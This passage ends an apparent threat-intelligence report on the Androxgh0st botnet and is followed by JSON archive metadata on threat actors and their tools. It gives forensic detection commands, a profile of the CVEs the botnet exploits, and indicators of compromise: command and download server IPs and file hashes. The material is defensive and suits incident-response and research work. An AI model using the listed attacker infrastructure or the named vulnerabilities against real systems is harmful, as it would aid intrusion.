locations:\r\nls -la /tmp\r\nls -la /var/tmp\r\nCheck File Permissions and Executable Files: Files in these directories should not typically be executable. Use\r\nfind to locate executable files in these directories:\r\nfind /tmp -type f -perm /111\r\n4. Analyze Network Connections and Traffic\r\nMonitor Outbound Connections to Known Malicious IPs or Domains: Androxgh0st may establish connections to\r\nits command-and-control (C2) server. Use tools like netstat or ss to identify active network connections:\r\nnetstat -antp | grep ESTABLISHED\r\nLook for unusual outbound connections on uncommon ports (e.g., high-numbered ports) or to external IPs that you\r\ndon’t recognize.\r\nCheck for Excessive or Unusual Traffic Patterns: Androxgh0st-infected devices may exhibit unusual traffic,\r\nparticularly if they are participating in a botnet. Monitor traffic for signs of:some text\r\nRepeated DNS lookups for suspicious domains.\r\nHigh volumes of outbound traffic that may indicate participation in DDoS activities.\r\n5. Review Security Configurations for Changes\r\nCheck for Unexpected Changes to Firewall and Router Settings: Androxgh0st may attempt to open additional\r\nports or modify firewall rules. Review firewall rules and router settings for unexpected modifications.\r\nInspect SSH Configuration for Weaknesses or Unauthorized Keys: If Androxgh0st used SSH brute-forcing to\r\ngain access, verify that no new SSH keys have been added to ~/.ssh/authorized_keys. \r\nCheck:\r\ncat ~/.ssh/authorized_keys\r\n6. Scan for Known Vulnerabilities and Apply Patches\r\nIdentify Vulnerable Services and Applications: Androxgh0st often exploits known vulnerabilities in web servers,\r\nrouters, and IoT devices. Use continuous attack surface scanners to detect any unpatched services or applications.\r\nUpdate Firmware and Software Regularly: Ensure that all devices, particularly IoT devices and routers, are\r\nrunning the latest firmware versions, as Androxgh0st targets unpatched CVEs.\r\n8. Check Logs for Signs of Persistence Mechanisms\r\nLook for Modified Configuration Files: Review configuration files for any injected commands that would re-enable the botnet upon reboot. This includes files such as /etc/rc.local, .bashrc, or any custom startup scripts.\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 29 of 32\n\nAudit System Logs for Malicious Activity Patterns: Look for patterns in auth.log, syslog, or application logs that may\r\nindicate Androxgh0st’s activity, including unexpected root login attempts or commands executed by web server user\r\naccounts.\r\nThreat Actor Activity and Rating\r\nThreat Actor Profiling\r\nActive since January 2024\r\nReputation HIGH\r\nCurrent\r\nStatus\r\nACTIVE\r\nHistory\r\nAndroxgh0st remains actively deployed in the wild, even after the Mozi killswitch activation. It scans\r\nfor vulnerable infrastructure and has now expanded its targets from just Laravel and Apache servers to a\r\nwide technology stack including but not limited to network gateway devices and WordPress.\r\nRating HIGH\r\nDetails\r\nKnown for exploiting well-documented vulnerabilities (e.g., CVE-2017-9841 in PHPUnit and\r\nCVE-2021-41773 in Apache HTTP Server) to establish control over web servers.\r\nUses a botnet for systematic exploitation, scanning, and persistent access via file uploads and\r\nbackdoors.\r\nHas exploited a wide range of vulnerabilities across different software (e.g., Jira, Metabase,\r\nSophos) to expand its control and facilitate remote code execution (RCE).\r\nReferences\r\n*Intelligence source and information reliability - Wikipedia\r\n#Traffic Light Protocol - Wikipedia\r\nOther sources\r\nAppendix\r\nIndicators\r\nRequest Logger and Command Sender - Androxgh0st\r\n165.22.184[.]66\r\n45.55.104[.]59\r\nApi[.]next[.]eventsrealm[.]com (Eventsrealm is a Jamaica-based events aggregator platform)\r\nTP Link Router Exploitation - Download servers\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 30 of 32\n\n45.202.35[.]24\r\n154.216.17[.]31\r\nGeoserver Exploitation - Download servers\r\n206.189.109[.]146\r\n149.88.44[.]159\r\nNetgear Router Exploitation - Download server\r\n200.124.241[.]140\r\nGPON Router Exploitation - Download server\r\n117.215.206[.]216\r\nRuckus Wireless Admin (CVE-2023-25717) \r\n45.221.98[.]117\r\nFile Hashes - Androxgh0st TP-Link Exploitation (md5)\r\n 2403a89ab4ffec6d864ac0a7a225e99a\r\n d9553ca3d837f261f8dfda9950978a0a\r\n c8340927faaf9dccabb84a849f448e92\r\n a2021755d4d55c39ada0b4abc0c8bcf5\r\n c8340927faaf9dccabb84a849f448e92\r\n db2a59a1fd789d62858dfc4f436822d7\r\n dd5e7a153bebb8270cf0e7ce53e05d9c\r\n f75061ac31f8b67ddcd5644f9570e29b\r\n 45b5c4bff7499603a37d5a665b5b4ca3\r\n 6f8a79918c78280aec401778564e3345\r\n e3e6926fdee074adaa48b4627644fccb\r\n abab0da6685a8eb739027aee4a5c4eaa\r\n 2938986310675fa79e01af965f4ace4f\r\n a6609478016c84aa235cd8b3047223eb\r\n 3cb30d37cdfe949ac1ff3e33705f09e3\r\n 0564f83ada149b63a8928ff7591389f3\r\n 3d48dfd97f2b77417410500606b2ced6\r\nFile Hashes - Androxgh0st Geoserver Exploitation (md5)\r\n f2af8db568f135cd9a788b7caff4d517\r\n 74f85c38ff44ff3b85124caf555cec27\r\n de86cb78023ce013f3b2b5e618b61401\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 31 of 32\n\n6f5a16332cb0b8fc787f1b1d30f5857a\r\n 2e599db6456fb778f8bc8d28837d5a45\r\nThreat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover\r\nattacker motives, methods, and operations.\r\nSubscribe to CloudSEK Resources\r\nGet the latest industry news, threats and resources.\r\nRelated Blogs\r\nPredict  Cyber Threats against your organization\r\nSource: https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 32 of 32\n\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave \nHunting for malicious infrastructure -found misconfigured Logger and Command Sender panels\nAs we can see, the servers are storing the POST and GET requests from the botnet agent over time.\n Page 4 of 32", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave" ], "report_names": [ "mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "58db0213-4872-41fe-8a76-a7014d816c73", "created_at": "2023-01-06T13:46:38.61757Z", "updated_at": "2026-04-10T02:00:03.040816Z", "deleted_at": null, "main_name": "Tonto Team", "aliases": [ "G0131", "PLA Unit 65017", "Earth Akhlut", "TAG-74", "CactusPete", "KARMA PANDA", "BRONZE HUNTLEY", "Red Beifang" ], "source_name": "MISPGALAXY:Tonto Team", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "da483338-e479-4d74-a6dd-1fb09343fd07", "created_at": "2022-10-25T15:50:23.698197Z", "updated_at": "2026-04-10T02:00:05.355597Z", "deleted_at": null, "main_name": "Tonto Team", "aliases": [ "Tonto Team", "Earth Akhlut", "BRONZE HUNTLEY", "CactusPete", "Karma Panda" ], "source_name": "MITRE:Tonto Team", "tools": [ "Mimikatz", "Bisonal", "ShadowPad", "LaZagne", "NBTscan", "gsecdump" ], "source_id": "MITRE", "reports": null }, { "id": "17d16126-35d7-4c59-88a5-0b48e755e80f", "created_at": "2025-08-07T02:03:24.622109Z", "updated_at": "2026-04-10T02:00:03.726126Z", "deleted_at": null, "main_name": "BRONZE HUNTLEY", "aliases": [ "CactusPete ", "Earth Akhlut ", "Karma Panda ", "Red Beifang", "Tonto Team" ], "source_name": "Secureworks:BRONZE HUNTLEY", "tools": [ "Bisonal", "RatN", "Royal Road", "ShadowPad" ], "source_id": "Secureworks", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "c39b0fe6-5642-4717-9a05-9e94265e3e3a", "created_at": "2022-10-25T16:07:24.332084Z", "updated_at": "2026-04-10T02:00:04.940672Z", "deleted_at": null, "main_name": "Tonto Team", "aliases": [ "Bronze Huntley", "CactusPete", "Earth Akhlut", "G0131", "HartBeat", "Karma Panda", "LoneRanger", "Operation Bitter Biscuit", "TAG-74", "Tonto Team" ], "source_name": "ETDA:Tonto Team", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "Bioazih", "Bisonal", "CONIME", "Dexbia", "Korlia", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "POISONPLUG.SHADOW", "RoyalRoad", "ShadowPad Winnti", "XShellGhost" ], "source_id": "ETDA", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434006, "ts_updated_at": 1775791940, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e7980900e51ed1349bb6b1216fc08c7a366d6c63.pdf", "text": "https://archive.orkl.eu/e7980900e51ed1349bb6b1216fc08c7a366d6c63.txt", "img": "https://archive.orkl.eu/e7980900e51ed1349bb6b1216fc08c7a366d6c63.jpg" } }